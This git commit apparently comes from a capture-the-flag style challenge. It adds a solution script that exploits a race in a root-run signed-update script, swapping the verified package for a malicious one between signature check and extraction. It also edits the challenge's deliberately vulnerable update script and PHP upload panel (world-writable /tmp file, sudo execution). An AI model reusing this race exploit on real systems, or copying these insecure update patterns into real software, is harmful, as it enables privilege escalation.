Update.sh does work; added complete solutions

2020-09-24 01:02:27 +02:00 · 2020-09-24 01:02:27 +02:00 · efef6c0a2d
commit efef6c0a2d
parent 07dc510a4a
4 changed files with 26 additions and 10 deletions
--- a/solution/exploit.sh
+++ b/solution/exploit.sh
@ -0,0 +1,16 @@
+#!/bin/sh
+
+# The solution require the original update.tar.cc in /tmp named 'orig'
+# and the fake package renamed to 'pwn' in /tmp. Both need to have chmod 777
+
+cd /tmp;
+cp orig update.tar.cc;
+chmod 777 update.tar.cc;
+sudo -u upgrade /bin/sh /update.sh > log &
+while true; do
+	if [[ "$(cat log | grep Checking)" ]]; then
+		sleep 0.01
+		cp pwn update.tar.cc;
+	fi
+done;
+
--- a/solution/update.tar.cc
+++ b/solution/update.tar.cc
--- a/update/update.sh
+++ b/update/update.sh
@ -13,30 +13,29 @@ if [[ "$auth" != "$password" ]]; then
        exit 1
 fi

-
 pubkey="/pub.pem"
 file="/tmp/update.tar.cc"
-/bin/chmod 777 $file
+sig="/tmp/sig"
 /bin/echo "### ccOS Update Script ###"
 /bin/echo "[+] Starting"
-/bin/sleep 1
 /bin/echo "[+] Extracting Signature"
 skip=$(expr $(stat -c '%s' $file) - 256)
 if [[ -L $file ]]
 then
 	exit 0
 fi 
-/bin/dd if=/tmp/update.tar.cc of=sig bs=1 count=256 skip=$skip
+/bin/dd if=/tmp/update.tar.cc of=$sig bs=1 count=256 skip=$skip
 /usr/bin/truncate -s $skip $file
-check=`/usr/bin/openssl dgst -sha256 -verify $pubkey -signature /tmp/sig $file`
+/bin/echo "[+] Checking Signature"
+check=`/usr/bin/openssl dgst -sha256 -verify $pubkey -signature $sig $file`
 if [ "$check" == "Verified OK" ]
 then
        /bin/echo "[+] Signature is valid!"
        /bin/echo "[+] Upgrading..."
        /bin/tar -xvf $file -C /
-        /bin/rm /tmp/sig
+        /bin/rm $sig
        /bin/echo "[+] Done"
 else
        /bin/echo "[-] Signature error, exiting..."
-        /bin/rm /tmp/sig
+        /bin/rm $sig
 fi
--- a/webpanel/update.php
+++ b/webpanel/update.php
@ -5,8 +5,9 @@ require_once("includes/header.php");
 require_once("includes/nav.php");

 if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['update']['size'] > 10000000 && $_FILES['upfile']['size'] < 10000000 && isset($_POST['password']) && !empty($_POST['password'])) {
-	move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/update.tgz.cc');
-	exec("/usr/bin/sudo key='".escapeshellarg($_POST['password'])."' /update.sh", $result);
+	move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/update.tar.cc');
+	exec("/bin/chmod 777 /tmp/update.tar.cc");
+	exec("key='".escapeshellarg($_POST['password'])."' /bin/sh -c '/usr/bin/sudo /bin/sh /update.sh'", $result);
 }

 ?>
@ -19,7 +20,7 @@ if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['
 					<input type="submit" class="btn btn-b btn-sm smooth" value="Upload">
 					<p>
 						<ul>
-							<li>Please select the file <i>ccOS-ver-xxxx.tgz.cc</i></li>
+							<li>Please select the file <i>update.tar.cc</i></li>
 							<li>The update will take about 2 minutes</li>
 							<li>Updates are cryptographically signed for integrity and authenticity</li>
 						</ul>